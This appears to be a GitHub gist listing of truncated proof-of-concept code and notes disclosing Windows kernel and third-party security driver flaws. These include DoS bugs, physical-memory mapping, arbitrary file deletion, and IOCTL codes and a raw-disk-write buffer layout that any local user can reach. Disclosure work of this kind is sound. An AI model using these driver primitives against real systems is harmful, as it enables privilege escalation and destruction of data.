
hfiref0x / NtCreateIoRing.cpp
Created February 19, 2021 08:12
Denial-of-service bug in Windows 10 (build 21313) NtCreateIoRing
#include <Windows.h>
#include <cstdio>
// Function-pointer type for the NtCreateIoRing system call. The four arguments
// are declared as opaque ULONG_PTR values: this snippet does not spell out the
// real parameter types, it only needs a callable shape to drive the syscall.
// NOTE(review): the pointer is presumably resolved at runtime (e.g. GetProcAddress
// on ntdll) — the lookup is not part of this excerpt.
typedef NTSTATUS(NTAPI* pfnNtCreateIoRing)(ULONG_PTR Param1, ULONG_PTR Param2,
                                           ULONG_PTR Param3, ULONG_PTR Param4);
#include <fusion.h>
// Function-pointer type shaped like the fusion CreateAssemblyEnum export
// (IAssemblyEnum / IAssemblyName come from <fusion.h>). pUnkReserved and
// pvReserved are marked reserved/optional by the SAL annotations and are
// presumably passed as NULL — confirm against the export's documentation.
typedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(_Out_ IAssemblyEnum** pEnum,
                                               _In_opt_ IUnknown* pUnkReserved,
                                               _In_opt_ IAssemblyName* pName,
                                               _In_ DWORD dwFlags,
                                               _Reserved_ LPVOID pvReserved);
typedef HRESULT(WINAPI* pfnCreateAssemblyCache)(
hfiref0x / enetech_new.c
Created August 12, 2020 12:26
EneTech driver, newest variant (May 2020): unlock (app + dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
// WinIO-style device type and function codes; the IOCTL defined right below
// (IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY) is presumably built from these with
// CTL_CODE. The MAP/UNMAP names indicate the driver maps physical memory into
// user mode on request.
// NOTE(review): if the device object is openable by unprivileged users, this is
// a direct read/write-physical-memory primitive — confirm the device ACL.
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
#pragma warning(disable: 4005)
#include <windows.h>
#include <cstdio>
#include <ntstatus.h>
typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
hfiref0x / SecureAPlus.c
Created February 28, 2020 05:45
SecureAPlus driver DoS
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
hfiref0x / imf.c
Created February 26, 2020 16:33
IObit Malware Fighter ImfObCallback.sys features
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS): the most interesting IOCTLs.

All parameters to these functions are supplied from user mode via DeviceIoControl. Everything listed here is reachable by any local user on a machine where this driver is running.

0x8000202C

Arbitrary file deletion: clears the target file's attributes via ZwSetInformationFile, then removes it with ZwDeleteFile. Note that Zw* calls issued from kernel mode run with a kernel previous mode, so unless the driver opens the file with OBJ_FORCE_ACCESS_CHECK the caller's own permissions on the file are not enforced — a path supplied via DeviceIoControl can therefore target files the user could not otherwise delete.

0x80002030

A wrapper around ZwQuerySystemInformation(SystemProcessInformation), i.e. a process list enumerated from kernel mode and returned to the caller.

hfiref0x / bkavsp.c
Created February 25, 2020 18:35
BKAVSP Arbitrary File Deletion
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
hfiref0x / desc.txt
Created February 25, 2020 08:07
SUPERAntispyware backdoor
This is the saskutil64.sys 1.0.0.1016 driver shipped with SUPERAntispyware 8.0.0.1050 (current at the time of writing), in both the Free and Pro editions.
The SaskCallDriver function works on a fixed-size buffer sent from user mode.
This buffer is a structure defined as follows:
#pragma pack(push, 1)
typedef struct _CALL_DRV {
WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0
LARGE_INTEGER StartingOffset;
SIZE_T DataSize;
PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.
int main()
{
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);